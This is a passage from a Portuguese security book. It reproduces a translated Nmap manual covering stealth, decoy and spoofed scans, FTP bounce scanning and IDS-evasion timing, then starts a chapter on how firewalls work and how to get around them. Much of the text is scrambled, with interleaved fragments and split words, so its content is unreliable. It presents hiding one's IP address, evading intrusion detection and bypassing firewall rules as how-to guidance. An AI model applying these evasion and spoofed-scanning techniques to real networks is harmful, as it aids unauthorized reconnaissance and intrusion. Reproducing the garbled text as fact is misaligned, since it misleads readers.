tagem desta técnica de scanning é que poucos sites irão registra-lá no arquivo de log. Desafortunada mente é necessário privilégios de super usuário (root) para construir estes pacotes SYN customiza dos. -sF -sX -sN vezes nem mesmo a técnica SYN scanning é clandes tina suficiente. Vários firewalls e filtros de pacotes observam por SYNs para portas restritas, e programas como Synlogger e Courtney estão disponíveis para detectar este tipo de scan. Por outro lado, scans avançados (stealth FIN, Xmas Tree, ou Null scan), podem ser capazes de passar através destes filtros sem serem molestados. A idéia é que portas fechadas são exigidas por responder aos pacotes de teste com um RST, enquanto portas abertas precisam ignorar os pacotes em questão (veja RFC 793 pp 64). A técnica d a técnica de scan Xmas Tree seta os flags FIN, URG e PUSH. A técnica de scan Null não seta nenhum flag. Desafortunadamente a Microsoft (como usual) decidiu completamente ignorar o padrão e faz as coisas do seu próprio jeito. Então este tipo de scan não funcionará contra sistemas executando Win dows95/NT. Do lado positivo, está é uma ótima maneira de distinguir entre duas plataformas. Se o scan encontrar portas abertas, é possível saber que a máquina não utiliza o Windows. Se as técnicas de scan -sF, -sX ou -sN mostram todas as portas fechadas, mesmo assim a técnica de scan SYN (- mostra portas sendo abertas, você poderá estar
Terrorismo Tecnológico Aprenda Para Sobreviver
224
olhando para uma máquina Windows. Esta é a maneira menos usada pelo nmap para testar a detecção do SO.
in
d
m, somente, descartar o pacote.
r
uina iva. A terceira técnica envolve o envio de
pacotes SYN e a espera pelo pacote com o flag RST or
a frente.
Note que o ping, por definição, é feito de qualquer
Exitem, também, alguns outros sistemas que são descobertos da mesma maneira que descobrimos o w dows. Estes incluem Cisco, BSDI, HP/UX, MVS, an IRIX. Todos acima enviam resets (RST) de portas abertas quando estes deve -sP Ping scanning: Algumas vezes você somente quer saber quais os hosts da rede estão ativos. O Nmap pode fazer isso enviando um pacote de requisição ICMP (ICMP echo request) para todo endereço IP especificado da rede. Os hosts que respondem estão vivos. Desafortunadamente, vários sites, como a microsoft.com, bloqueiam pacotes de requisição ICMP (echo request). Então, o nmap pode, também, envia um pacote ACK TCP para (por definição) a porta 80. Se nós pegarmos o flag RST novamente, a máq esta v ou os flags SYN/ACK. O método connect() é usado p usuários comuns (não root). Por definição (para super usuários), o nmap usa tanto as técnicas do ICMP e a do flag ACK em par alelo. Você pode mudar as -P opções descritas mais forma, e somente os hosts que respondem são scan neados. Somente use esta opção se você desejar vas culhar sem fazer qualquer scan real de portas. -sU
Terrorismo Tecnológico Aprenda Para Sobreviver
225
UDP scans: Este método é usado para determinar
)
m de a),
g é Eu, usualmente, lembro desta como uma
recente falha no rpcbind do Solaris. O Rpcbind pode r encontrado escondido em uma porta UDP não docu
mentada em algum lugar acima de 32770. Então não
ual inas
e
s,
sugestão da RFC 1812 (seção 4.3.2.8) de limitar a taxa de mensagens de erro
MP. Por exemplo, o núcleo do Linux (em net/ipv4/icmp.h) limita a geração de mensagens de
quais portas UDP (User Datagram Protocol, RFC 768 estão abertas no host. A técnica implica em enviar 0 bytes de dados de pacotes UDP para cada porta da máquina alvo. Se nós recebermos uma mensage ICMP port unreachable (porta ICMP não alcançad então a porta está fechada. Por outro lado nós assumimos que a porta está aberta. Várias pessoas pensam que a técnica UDP scannin supérfluo. se importa que a porta 111 esteja bloqueada por um firewall. Porém, você pode encontrar quais as por tas altas, maiores de 30.000, que estão no estado listening? Com o scanner UDP você pode! Existe, também, o programa cDc Back Orifice backdoor o q se oculta em uma porta UDP configurável em máqu Windows. Alguns serviços comumente vulneráveis qu utilizam o UDP são: snmp, tftp, NFS, etc. Desafortunadamente UDP scanning é algumas veze dolorosamente, vagarosa desde que a maioria dos hosts implementam a IC destination unreachable para 80 por 4 segundos, com 1/4 segundos de penalidade se esta for excedida. O Solaris tem um limite muito mais restrito (mais ou menos 2 mensagens por segundo) e assim gasta um tempo maior para realizar o scan. Nmap detecta esta taxa limitante e reduz conformemente, por outro lado inunda a rede com pacotes sem uso que
Terrorismo Tecnológico Aprenda Para Sobreviver
226
irão ser ignorados pela máquina alvo. Como é típico, a Microsoft ignorou a sugestão da RFC e não parece ter feito nenhuma taxa limitante por completo no Win95 e no NT. Então é possível scannear, rapidamente , todas as portas de 64K das
ws. Beleza!
-sO
a
s
sim
r
do
ável.
ado
sta pode ajudar a determinar quando um firewall é stateful ou somente um filtro de pacotes
máquinas windo Scan do Protocolo IP: Este método é usado para determinar quais protocolos IPs são usados no host. A técnica consiste em enviar pacotes IP raw sem promover nenhum cabeçalho para cada protocolo específico na máquina alvo. Se nós recebermos um mensagem do protocolo ICMP unreachable, então o protocolo não está sendo usado. Por outro lado nó assumimos que está aberto. Note que vários hosts (AIX, HP-UX, Digital UNIX) e firewalls podem não enviar mensagens de protocolo unreachable. As faz parecer que todos os protocolos estão "aber tos". Isso porque a técnica implementada é muito simila ao scanning da porta UDP, onde a taxa limite de ICMP pode ser aplicada também. Porém o campo protocolo IP tem somente 8 bits, então no máximo 256 protocolos podem ser testados, os quais devem ser possíveis de serem testados em tempo razo -sA ACK scan: Este método avançado é usualmente us para mapear o conjunto de regras de um firewall. Em particular, e simples que bloqueia pacotes SYN de chegada.
Terrorismo Tecnológico Aprenda Para Sobreviver
227
Este tipo de scan envia pacotes com o flag ACK setado para uma porta específica. Se um RST voltar,
"não filtradas", obtendo, assim, nenhuma porta mostrada na saída é usualmente um sinal que todos os testes foram
scedidos (e retornado RSTs). Esta técnica de scan nunca irá, obviamente, mostrar portas no estado
eto que as vezes pode ser possível detectar portas abertas mesmo sendo filtradas, isso
vido a anomalia do tamanho da janela TCP repor tado por vários sistemas operacionais. Sistemas
4 -UX, QNX,
com
e elas com comandos NULL de programas SunRPC
numa tentativa de determinar quando elas são portas C, e se são, qual programa e versão dos serviços.
Com este método você pode efetivamente obter a
a porta é classificada como "não filtrada". Se não voltar nada ou um ICMP unreachable voltar, a porta é classificada como "filtrada". Note que o nmap usualmente não imprime portas su "aberto". -sW Window scan: Este scan avançado é muito similar ao ACK scan, exc de vulneráveis para isso incluem no mínimo várias versões do AIX, Amiga, BeOS, BSDI, Cray, Tru6 UNIX, DG/UX, OpenVMS, Digital UNIX, FreeBSD, HP OS/2, IRIX, MacOS, NetBSD, OpenBSD, OpenStep, Rhapsody, SunOS 4.X, Ultrix, VAX, and VxWorks. Vejam no arquivo, na lista de discussão nmap-hack ers, a lista completa. -sR RPC scan. Este método trabalha em combinação várias técnicas de scan de portas do Nmap. Ele pega todas as portas TCP/UDP encontradas abertas inunda RP
Terrorismo Tecnológico Aprenda Para Sobreviver
228
mesma informação como se usasse 'rpcinfo -p' mesmo se o portmapper alvo estiver atrás de um firewall (ou protegido pelo TCP wrappers). Decoy não tra balha correntemente com RPC scan, em algum ponto eu posso adicionar o suporte decoy para UDP RPC scans.
-b <ftp relay host>
RFC foi escrita. Porém na internet hoje, nós não odemos ter pessoas hijacking servidores ftp e req
uisitando que os dados sejam jogados para *
s es, preenchendo discos, tentando saltar
firewalls, e geralmente sendo aborrecido, ficando, assim, difícil seguir a pista ao mesmo tempo." O que nós iremos explorar disto é o scan de portas TCP do servidor "proxy" de ftp. Então você pode
onectar a um servidor ftp atrás do firewall, e então scannear portas que estão mais provávelmente
FTP bounce attack: Uma interessante "carac terística" do protocolo ftp (RFC 959) é sustentada para conexões ftp "proxy". Em outras palavras, eu devo ser capaz de conectar do evil.com para um servidor FTP, target.com, e requerer que o servidor envie um arquivo para qualquer lugar na internet! Isto pode ter sido explorado bem em 1985 quando a p arbitrários pontos na internet. Como *Hobbit escreveu em 1995, este protocolo torna inútil "pode ser usado para portar virtualmente não deter mináveis emails ou news, forjando em servidore vários sit c bloqueadas (139 é uma boa). Se o servidor ftp per mitir ler de e escrever para algum diretório (como /incoming), você pode enviar dados arbitrários para portas que você achar abertas (nmap não faz isso por você). Os argumentos passados para a opção 'b' é o host
Terrorismo Tecnológico Aprenda Para Sobreviver
229
que você quer usar como proxy, na notação de padrão :port.
opcional. Para determinar quais servidores são vulneráveis para este ataque,
eá-los. Isto permite scannear as redes que não permitem ICMP echo
g
(ou para uma simples máquina) e então esperamos por respostas. Hosts que estão ativos devem responder com um RST. Esta opção preserva a eficiência de somente scannear hosts que estão ativos, enquanto
ainda permite scannear redes/hosts que bloquearam pacotes ping. Para usuários não root, é usado o
URL. O formato é: username:password@server Tudo, menos o server é você pode ver meu artigo em Phrack 51. A versão atualizada está disponível em nmap URL (http://www.insecure.org/nmap). -P0 Pinga os hosts antes de scann requests (ou responses) através dos seus firewalls. microsoft.com é um exemplo desta rede, e então você deve sempre usar -P0 ou -PT80 quando portscannin microsoft.com. -PT Use TCP "ping" para determinar quais hosts estão ativos. Ao invez de enviar pacotes ICMP echo request e esperar pelas respostas, nós enviamos pacotes TCP ACK por toda parte na rede alvo connect(). Para setar a porta destino dos pacotes de teste usem -PT<número da porta>. A porta default é 80, desde que está porta é muitas vezes não fil trada. -PS
Terrorismo Tecnológico Aprenda Para Sobreviver
230
Está opção usa pacotes com SYN (connection request) ao invez de pacotes com ACK para usuários root. Hosts que estão ativos devem responder com RST (ou,
Está opção usa um pacote ping verdadeiro (ICMP echo equest). Esta encontra os hosts que estão ativos e
também procura por um endereço de broadcast para a
rede ados se
es m).
) e pacotes ICMP ( -PI ) ocê pode obter
Esta opção ativa a identificação de hosts remotos ia TCP/IP fingerprinting. Em outras palavras, ela
usa uma grande quantidade de técnicas para detectar
s
raramente, um SYN|ACK). -PI r subrede da sua rede. Estes são endereços IPs que são externamente alcançáveis e traduzidos para broadcast de pacotes IP de chegada para uma sub de computadores. Estes devem ser elimin encontrado, como ele permitem por númerosos ataqu de negação de serviço (DoS) (Smurf é o mais comu -PB Este é o tipo de ping default. Ele usa tanto pacotes com ACK ( -PT sweeps em paralelo. Desta maneira v os firewalls que filtram cada uma (porém não ambas). -O v sutilezas na pilha de rede do sistema operacional do computador que você está scanneando. Ele usa estas informações para criar a 'fingerprint' a qual é comparada com sua base de dados de conhecido
Terrorismo Tecnológico Aprenda Para Sobreviver
231
fingerprints de SOs (o arquivo nmap-os-finger prints) para decidir qual o tipo de sistema que você está escanneando.
Se o Nmap está desabilitado para resolver o SO da a
ndo executado na máquina. Por fazer isso você contribui para o conjunto de sis
conhecidos pelo nmap e então erá mais correto para todos.
ual a dificuldade em
estabelecer uma conexão TCP forjada contra um host útil para explorar o IP de origem
aseado na relação de confiança (rlogin, firewall filters, etc) ou por esconder a origem do ataque. O
em
nning do ident reverso TCP. Como notado por Dave Goldsmith em 1996 na mensagem para
ocolo ident (rfc 1413) permite evelar o username dos donos dos processos conecta
dos via TCP, mesmo se estes processos não iniciaram
máquina, e as condições são boas (ex. ao menos um porta aberta), Nmap irá prover a URL que você pode usar para submeter a fingerprint se você conhecer (com certeza) o SO se temas operacionais s A opção -O também possibilita classificar e fazer o prognostico da sequência TCP. Esta é uma medida que descreve aproximadamente q remoto. Esta é b número difficulty mostrado é baseado em uma simples amostra estatística e pode variar. Este número é geralmente melhor apresentado como uma frase Inglês como "worthy challenge" ou "trivial joke". -I Esta ativa o sca a Bugtraq, o prot r a conexão. Então você pode, por exemplo, conectar a porta http e então usar o identd para encontrar
Terrorismo Tecnológico Aprenda Para Sobreviver
232
quando o servidor está sendo executado como root. P
s
o, e outros aborrecimentos para detectar o que você está
uidadoso com isso! Vários programas tem preocupações lidando com estes cuidadosos
pacotes. Enquanto este método não obtem pacotes
ão conseguem asse gurar o golpe de performance que este fato causa, então é melhor deixar este desabilitado.
ote que esta opção, ainda, não esta funcionando em todos os sistemas. Esta funciona bem para o Linux,
o
tecendo. Você pode usá-la duas vezes para um melhor efeito. Use -d em conjunto se você realmente
Isto pode somente ser feito com uma conexão TC completa para a porta alvo (ex.: a opção de scan ning -sT). Quando -I é usada, o identd do host remoto é pesquisado para cada porta aberta encon trada. Obviamente isso não funciona se o host não estiver rodando o identd. -f Esta opção requere os flags SYN, FIN, XMAS, ou NULL scan para usar cuidadosos pacotes IP fragmentados. A idéia é dividir o cabeçalho TCP sobre vário pacotes para ficar difícil para o filtro de pacotes, sistemas de detecção de intrusã fazendo. Seja c filtrados e firewalls que enfileram todos os frag mentos IP (como a opção CONFIG_IP_ALWAYS_DEFRAG no kernel do linux), várias redes n N FreeBSD, e OpenBSD e outras pessoas tem reportad sucessos com outras variações *NIX. -v Modo Verbose. Esta é uma opção altamente recomen dada e fornece mais informações sobre o que esta acon
Terrorismo Tecnológico Aprenda Para Sobreviver
233
quiser ficar louco com a quantidade de informações a tela!
ocê
ste log mostra o resultado do seu scan em uma forma humanamente legível no arquivo que você
ento. cilmente capturar e
interpretar os resultados do Nmap. Você pode fornecer o argumento ´-´(sem quotas) para colocar
t (para shell pipelines, etc). Neste aso uma saída normal será suprimida. Tomar cuidado
para as mensagem de erro se você esta usando esta
u
n -h Esta cômoda opção mostra uma rápida tela de referência das opções usadas no nmap. Como v deve ter notado, está man page não é exatamente uma 'rápida referência' :o) -oN <logfilename> E especificou como argumento. -oX <logfilename> Este log mostra o resultado do seu scan na forma de XML no arquivo que você especificou como argum Isto permite aos programas fa em uma stdou c (elas, ainda, irão para stderr). Também, note que ´-v´ pode causar algumas informações extras para ser impressas. -oG <logfilename> Este log mostra o resultado do seu scan na forma do grepable no arquivo que você especificou como arg
Terrorismo Tecnológico Aprenda Para Sobreviver
234
mento. Este simples formato provê todas as informações em uma linha (então você pode facil
a portas ou obter informações e SOs e ver todos os endereços IPs). Este é o
mecanismo preferido pelos programas para interagir da
r
shell pipelines, etc). Neste caso uma saída normal será suprimida. Tomar
de erro se você esta sando esta (elas, ainda, irão para stderr).
Também, note que ´-v´ irá fornecer várias
--resume <logfilename>
. oi
scanneada com sucesso e armazenada no arquivo de
mente usar o grep par d com o Nmap, porém agora é recomendado usar a saí em XML (-oX). Este simples formato pode não conte tantas informações quanto os outros formatos. Você pode fornecer o argumento ´-´(sem quotas) para colocar em uma stdout (para cuidado para as mensagem u informações extras para ser impressas. -oS <logfilename> thIs l0gz th3 r3suLtS of YouR ScanZ iN a s|<ipT kiDd|3 f0rM iNto THe fiL3 U sPecfy 4s an arGuMEnT! U kAn gIv3 the 4rgument ´-´ (wItHOUt qUOteZ) to sh00t output iNT0 stDouT!@!! O scan de rede que é cancelado devido a um control- C, interrupção da rede, etc. pode ser resumido usando esta opção. O logfilename precisa ser normal (-oN) ou parsable na máquina (-oM) para registrar o scan abortado. Nenhuma outra opção pode ser usada Nmap começará na máquina depois que a última f log.
Terrorismo Tecnológico Aprenda Para Sobreviver
235
-iL <inputfilename> É feita a leitura de um arquivo alvo especificado na linha de comando. O arquivo deve conter uma lista de hosts ou expressões de rede separados por espaços, tabs, ou novas linhas. Use o hífen (-)
e
ntediado, tente nmap -sS -iR -p 80 para encontrar vários
r todas as portas entre 1 e 1024 tão bem
quanto qualquer porta listada no arquivo de l vem com o nmap. Para o scan de pro
ocolos IP (-sO), especifica o número do protocolo
como inputfilename se você quisesse que o nmap leia expressões do hosts de stdin (como no final do pipe). Veja a seção especificação do alvo para maiores informações nas expressões que você preencherá no arquivo. -iR Esta opção fala para o Nmap para gerar seus próprios hosts para scannear, usando simplesment números randomicos :o). Isso nunca irá terminar. Isso pode ser muito útil para tirar amostras estatísticas da internet para estimar várias coisas. Se você nunca estiver realmente e servidores web para observar. -p <port ranges> Esta opção especifica quais portas você quer para descrever. Por exemplo '-p 23' irá tentar somente a porta 23 do host(s) alvo. ´-p 20-30,139,60000-´ irá scannear portas entre 20 e 30, porta 139, e todas as portas maiores que 60000. Por definição é para scannea serviços o qua t
Terrorismo Tecnológico Aprenda Para Sobreviver
236
que você deseja para (0-255).
mente deseja scannear por portas catalogadas no arquivo services o qual vem
o decoys estão scanneando a rede alvo também. Então seus IDS precisarão repor
an de portas de um único endereço IP, orém eles não saberão qual o endereço IP que os
estava scanneando e quais eram os decoys inocentes. a
efetiva para esconder seu endereço IP.
eparando cada decoy host com vírgulas, você pode usar opcionalmente 'ME' como um dos decoys para
ta
-F Modo de scan rápido. Especifica que você so com o nmap (ou o arquivo de protocolos para -sO). Este é obviamente muito mais rápido do que scannear todas 65535 portas no host. -D <decoy1 [,decoy2][,ME],...> O processo de decoy scan será executado fazendo ele mostrar-se para o host remoto que o(s) host(s) que você especificou com tar 5-10 sc p Enquanto isto pode ser descoberto através de um rota, respostas soltas, e outras mecanismos ativos, este é geralmente uma técnica extremamente S representar a posição que você quer seu endereço IP para ser usado. Se você colocar 'ME' na sex posição ou outra maior, várias detectores comuns de scan de portas não serão razoáveis para mostrar seu endereço IP por completo. Se você não usar 'ME', o nmap irá colocar você em uma posição randomica. Note que os hosts que você usa como decoys devem estar ativos ou você precisará acidentalmente inun
Terrorismo Tecnológico Aprenda Para Sobreviver
237
dar com pacotes SYN seu alvo. Também, ele será muito fácil para determinar quais hosts estão scan neando se somente um está atualmente ativo na rede.
e
Também, note que vários (estúpidos) "detectores de
o canneando com a máquina
decoy que você esta usando. Isto pode causar aiores problemas para a máquina alvo se o decoy
está sendo usado, digo, seu internet gateway ou até
istória é que os detectores de scan de portas spoofable não devem
tra a máquina que parece estar scanneando suas portas. Este pode ser somente um
decoy, ou seja, uma isca, uma armadilha!
-O
registrador que usa vários decoys ue podem atrasar seu scan e potencialmente até
fazer este menos preciso. Também, vários ISPs fil
Você deverá querer usar o endereço IP ao invez d nomes (então redes decoy não irão ver você em seus nameserver logs). scan de portas" irão firewall/deny roteamento para hosts que tentam fazer o scan de portas. Então você precisa descuidadosamente causar a perda de conexã da máquina que você está s m "localhost". Então você pode querer ser cuidadoso com esta opção. A real moral da h gastar ações con Decoys são usados tanto em ping scan inicial (usando ICMP, SYN, ACK, ou o que seja) e durante a fase de atual scanneamento de porta. Decoy são também usados durante a detecção remota de SO ( ). Este é um digno q tram pacotes spoofed, embora vários (correntemente a maioria) não restrigem pacotes IP spoofed por inteiro. -S <IP_Address>
Terrorismo Tecnológico Aprenda Para Sobreviver
238
Em várias circunstâncias, nmap pode não ser capaz
e determinar seu endereço de origem ( nmap irá avisá-lo se este é o caso). Nesta situação, use -S
n te
so
somente que isso levanta uma interessante discussão, em que as pessoas devem estar cientes
antes que elas acusem outras pessoas de estar scan
ara este tipo de uso.
n
s
as ê
d com seu endereço IP (através da interface que você deseja enviar pacotes). Outro possível uso deste flag é para spoofar o scan para fazer o alvo pensar que alguém mais está sca neando. Imagine uma companhia sendo repetidamen port scanned pelo seu competidor! Este não é um u suportado (ou o principal propósito) deste flag. Eu penso neando suas portas. -e geralmente será requerida p -e <interface> Fala para o nmap qual interface enviar e receber pacotes. Nmap deve ser capaz de detectar isto, porém este contará para você se não puder. -g <portnumber> Conjunto de números de portas de origens usadas no scan. Vários ingênuos firewalls e filtros de pacotes instalados fazem uma exceção em seus co juntos de regras para permitir pacotes DNS (53) ou FTP-DATA (20) para entrar e estabelecer a conexão. Obviamente isto contesta completamente as vantagen de segurança do firewall desde que intrusos podem somente mascarar como FTP ou DNS por modificar su portas de origem. Obviamente para UDP scan voc
Terrorismo Tecnológico Aprenda Para Sobreviver
239
deve tentar 53 primeiro e TCP scans devem tentar 20
sta
o
o informações úteis no número da porta de origem.
ts
ala para o Nmap para embaralhar cada grupo acima de 2048 hosts antes de scanneá-los. Isto pode fazer
na
antes da porta 53. Note que isso é somente uma req uisição -- nmap honrará isso somente quando e estiver hábil para. Por exemplo, você não pode amostrar todo TCP ISN de um host:porta para um host:porta, então nmap muda a porta de origem mesm que seja usado -g. Seja ciente que existe uma penalidade na perfor mance em vários scans por usar esta opção, porque eu algumas vezes armazen -r Fala para o Nmap para não randomizar a ordem na qual as portas serão scanneada. --randomize_hos F o scan menos evidente para vários sistemas de moni toração de rede, especialmente quando você combi estes com as opções de baixo tempo (slow timing) (veja abaixo). -M <max sockets> Conjunto máximo de números de sockets que será usado em paralelo pelo TCP connect() scan (por definição). Esta é útil para diminuir um pouco o scan e anular a possibilidade de travar a máquina remota. Outra aproximação é para usar -sS, a qual é geralmente fácil para as máquinas descreverem.
Terrorismo Tecnológico Aprenda Para Sobreviver
240
OPÇÕES DE TEMPO
eralmente o Nmap faz um bom trabalho em ajustar para as características da rede um tempo de
sível m
bjetivos. As seguintes opções
provêem um fino nível de controle sobre o tempo de
p. Paranoid modo de scan muito lento na esperança de prevenir a detecção pelo sistema IDS.
Este serializa todos os scans (scanning não par no mínimo 5 minutos
ntre o envio de pacotes. Sneaky é similar, exceto que somente espera 15 segundos entre o envio de
o
default do Nmap, o qual tenta executar tão rápido quanto possível sem sobrecarregar a rede ou perder
timeout de 5 minutos por host e nunca espera mais
não se importa em perder algumas
G execução e scanning tão rápido quanto pos enquanto minimiza as chances do hosts/portas sere não detectadas. Entretanto, existem vários casos onde a política de tempo default do Nmap pode não encontrar seus o scan: -T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> Estas são políticas de tempo preservados para con venientemente expressar suas prioridades para o Nma alelo) e geralmente espera e pacotes. Polite tem o significado para facilitar a carga na rede e reduzir as chances de travar a máquina. Ele serializa os testes e espera no mínim 0.4 segundos entre eles. Normal é o comportamento hosts/portas. Aggressive esse modo adiciona um que 1.25 segundos para testar as respostas. Insane é somente adequando para redes muito rápidas ou onde você
Terrorismo Tecnológico Aprenda Para Sobreviver
241
informações. Nesta opção o timeout dos hosts acon tecem em 75 segundos e espera somente 0.3 segundos
, de qualquer forma, uma varredura extremamente rápida na rede
er
idos abaixo.
ost_timeout <milliseconds>
Especifica a soma máxima de tempo do Nmap tem per antes de
retransmitir ou ocorrer um timeout de um particular
tempo que o usual. Com este parâmetro você pode garantir que o
por teste individual. Esta possibilita :o). Você pode também referenciar isso por números (0-5). Por exemplo, ´-T 0´ fornece para você o modo Paranoid e ´-T 5´ é o modo Insane. Estes modos, para preservar o tempo, NÃO devem s usados em combinação com controles de baixo nível, como os fornec --h Especifica a soma de tempo que o Nmap permite para gastar scanneando um simples host antes de desistir daquele IP. O modo de tempo default não tem o time out do host. --max_rtt_timeout <milliseconds> mitido para esperar pela resposta de teste teste. O modo default seta este valor em 9000. --min_rtt_timeout <milliseconds> Quando um host alvo começa a estabelecer um padrão de resposta muito rápido, Nmap irá contrair a soma de tempo fornecida por teste. Isto aumenta a velocidade do scan, porém pode levar a perder pacotes quando a resposta gasta mais
Terrorismo Tecnológico Aprenda Para Sobreviver
242
Nmap irá esperar ao menos a soma de tempo fornecida antes de abrir mão do teste.
--initial_rtt_timeout <milliseconds>
r boas estima
tivas RTT do ping e dos primeiros testes. O modo default usa 6000. --max_parallelism <number> Especifica o número máximo de Nmap scans permitidos para serem pe stando este para 1 significa que o Nmap nunca irá tentar scann
diminuir a man var-se do IDS. nmap -v target.example.com Esta opção faz o scan de todas as portas TCP reservadas na máquina target.example.com. A opção -v significa ligar o modo verbose.
Especifica o timeout do teste inicial. Isto é geralmente útil quando scanning firewalled hosts com -P0. Normalmente o Nmap pode obte
rformados em paralelo. Aju
ear mais que uma porta por vez. Este, também, afeta outros scans paralelos como o ping sweep, RPC scan,
etc.
--scan_delay <milliseconds>
Especifica a mínima soma de tempo que o Nmap pre cisa esperar entre testes. Este é, na maioria das vezes, útil para reduzir a carga da rede ou para
eira de scan para esqui
Terrorismo Tecnológico Aprenda Para Sobreviver
243
nmap -sS -O target.example.com/24 Lança um stealth SYN scan contra cada máquina que está ativa, abrangendo todas as 255 máquinas de classe 'C' onde target.example.com reside. Este exemplo, também, tenta executando em cada host que esta ativo. Este requere privilégios de root (super usuário) por causa da técnica SYN scan e da detecção de SOs. nmap -sX -p 22,53,110,143,4564 198.116.*.1-127 Envia um Xmas tree scan para a primeira metade de cada uma das 255 possibilidades de subredes de 8 bit no espaço de endereços classe 'B' em 198.116. Nós estamos testando quando o sistema executa sshd, DNS, pop3d, imapd, ou a porta 4564. Note que o Xmas scan não trabalha com a Microsoft devido a sua deficiente pilha TCP. O mesmo acon tece com CISCO, IRIX, HP/UX, e BSDI. nmap -v --randomize_hosts -p 80 '*.*.2.3-5' Em lugar de focar somente um específico IP, é interes sante, algumas vezes, abranger um fatia de toda a internet e fazer o scan de um pequena amostra de cada fatia. Este comando encontra todos os servidores web em máquinas com endereços IPs terminando em .2.3, .2.4, ou .2.5. Se você é super usuário (root) você pode adicionar -sS. Também, você irá encontrar mais máquinas interessantes começando com 127., então você pode querer usar '127-222' ao invez dos primeiros asterísticos porque essa parte tem uma alta den sidade de máquinas interessantes (IMHO).
determinar o sistema operacional que esta
Terrorismo Tecnológico Aprenda Para Sobreviver
244
host -l company.com | cut '-d ' -f 4 | ./nmap -v -iL - Fazer uma transferência de zona de DNS para encontrar hosts em company.com e então alimentar os endereços IPs para o nmap. Os comandos acima são para minha caixa
GNU/Linux. Você pode precisar de diferentes coman dos/opções em outros sistemas operacionais.
Cuidado com testes!
administradores, donos de empresas e empregados e até u
sistema ficam com a falsa impressão de segurança. Isto é muito perigoso, pois alguns minutos depois de ter sido feito o teste, al m
Muitossuários domésticos, após terem feitos testes no seu
gu funcionário pode ter, por exemplo, recebido um e-mail e este, que estava infectado, abriu uma porta do sistema.
Claro que os testes devem ser utilizados porém muito cuidado, pois absolutamente não são motivos para
despreocupação e sim somente mais uma arma que deve ser utilizada para continuar a manutenção de segurança, que deve
ser continua sempre!
Terrorismo Tecnológico Aprenda Para Sobreviver
245
Capítulo XIV FireWalls – Funcionamento, e como burlar.
Terrorismo Tecnológico Aprenda Para Sobreviver
246
14.1 Introdução Firewalls são mecanismos utilizados para aumentar a segurança
de redes ligadas a Internet, espécies de barreira de proteção, constituí
e duas redes geralmente entre a rede l
o. Alguns firewalls dão maior ênfase ao bloqueio de tráfego, enquanto outros enfatizam a permissão do tráfego, o importante é configurá-l de acordo com a política de segurança da organiza elecendo o tipo de acesso que deve ser pe
ede interna), que é en
endecontrole de acesso, om base nas má
das de um conjunto de hardware e software. Ele cria como se fosse um muro com buracos, e dependendo do tipo de dados que chega até ele deixa passar para dentro ou fora da rede ou o destrói.
Firewall é um sistema ou um grupo de sistemas que garante uma política de controle de acesso entr
ocal e Internet, mas pode ser usado também para Rede local X Rede local. Em princípio firewalls podem ser vistos como um par de mecanismos: um que existe para bloquear o tráfego e outro que existe para permitir o tráfeg
oção que o utiliza, estabrmitido ou negado.
14.2 Podem funcionar da seguinte forma: Os filtros de pacotes utilizam endereços IP de origem e de
destino, e portas UDP e TCP para tomar decisões de controle de acesso. O administrador elabora uma lista de máquinas e serviços que estão autorizados a transmitir datagramas nos possíveis sentidos de transmissão (entrado ou saindo da r
tão usada para filtrar os datagramas IP que tentam atravessar o firewall. Um exemplo de política de filtragem de pacotes seria permitir o tráfego de datagramas carregando mensagens de HTML e DNS nas duas direções, tráfego Telnet só para pacotes saindo da rede interna e impedir todos os outros tipos de tráfego.
A filtragem de pacotes é vulnerável a adulteração dereços IP e não fornece uma granularidade muito fina de
já que o acesso é controlado cquinas de origem e de destino dos datagramas.
Terrorismo Tecnológico Aprenda Para Sobreviver
247
Na segunda categoria de firewalls, um gateway de circuitos atua como intermediário de conexões TCP, funcionando como um TCP modificado. Para transmitir dados, o usuário origem conecta-se a uma porta TCP no gateway, que por sua vez, conecta-se ao usuário destino usando outra conexão TCP. Para que seja estabelecido um circuito o usuário de origem deve fazer uma solicitação para o gateway no firewall, passando como parâmetros a máquina e o serviço de destino. O gateway então estabelece ou não o circuito, note que um mecanismo de autenticação pode ser implementado neste protocolo.
Firewalls onde os gateways atuam em nível de aplicação utilizam implementações especiais das aplicações desenvolvidas especificamente para funcionar de forma segura. Devido a grande flexibilidade desta abordagem ela é a que pode fornecer maior grau de
um único host de acesso externo (bastion host). Além disso, a aplicação FTP pode ser modificada para limitar a tra
Isto é conseguirmos ter algum acesso que, a princípio, não seria permitido pelo firewall.com a instalação foram feitas regras para impedir o acesso a determinadas portas e serviços, mas estas regras não foram suficientes para isto e foi possível contornar a negação do serviço.
Um exemplo notável: em um firewall, colocaram-se regras para impedir o acesso dos usuários da rede interna ao Internet Relay Chat (IRC), um serviço de bate-papo. Basicamente, fecharam-se as portas definidas para este serviço - de 6667 a 7000. No entanto, um
proteção. Por exemplo, um gateway FTP pode ser programado para restringir as operações de transferência a arquivos fisicamente localizados em
nsferência de arquivos da rede interna para a externa, dificultando ataques internos.
14.3 Evasão de Firewall
Terrorismo Tecnológico Aprenda Para Sobreviver
248
dos usuários descobriu um servidor de IRC que também permite conexões pela porta 6660, não impedida pelo firewall, e, configurando o cliente deste serviço para esta porta, conseguiu evadir-se das regras do firewall.
Então o que acontece é que mesmo um firewall impedindo um determinado tipo de acesso como, por exemplo, paginas pornográficas, é possível mesmo assim acessá-las e é nisso que consiste a evasão.
Estarei mostrando aqui como fazer isso se você estiver dentro da rede isto é de dentro para fora e não de fora para dentro, porém é possível e muito parecido.
14.4 Como fazer?
O Firewall é uma barreira baseada em regras e digamos que o administrador colocou as seguintes: “impeça o acesso a todos os sites que têm a palavra 'sexo' no meio”; ou “proíba todo acesso, menos os acessos HTTP que passarem pelo proxy filtrador de con é meio complicado, mas é mais fácil enganá-las e fazer com que o con
esunção, isto é, acessando algum servidor de IRC previamente preparado que escute por outra porta, estaremos burlando esta regra e usando o bate papo do mesmo jeito!
Todo firewall pod nos um tipo de
teúdo sexo”. Destruir essas regras estabelecidas
teúdo se encaixe no que o firewall permite!
Então um IRC (bate-papo) - que responde a porta 6667, quebrando esta pr
e ser enganado, pois pelo meserviço ele tem que oferecer.
Deve-se fazer com que firewall imagine que está oferecendo um serviço quando na verdade está oferecendo outro. No entanto,
Terrorismo Tecnológico Aprenda Para Sobreviver
249
temos q ll: o ponto em qu ele sai do firewall para o mundo extexterno para o firewall e o ponto em que ele volta do firewall para o nosso computador. e para cada um destes pontos, possivelmente, pre
nosso dado para seu
no firewall; e um desconversor para, assim que o dado chega a nós, con
uatro pontos de encontro de nossos dados com o firewae ele chega no firewall, o ponto em que
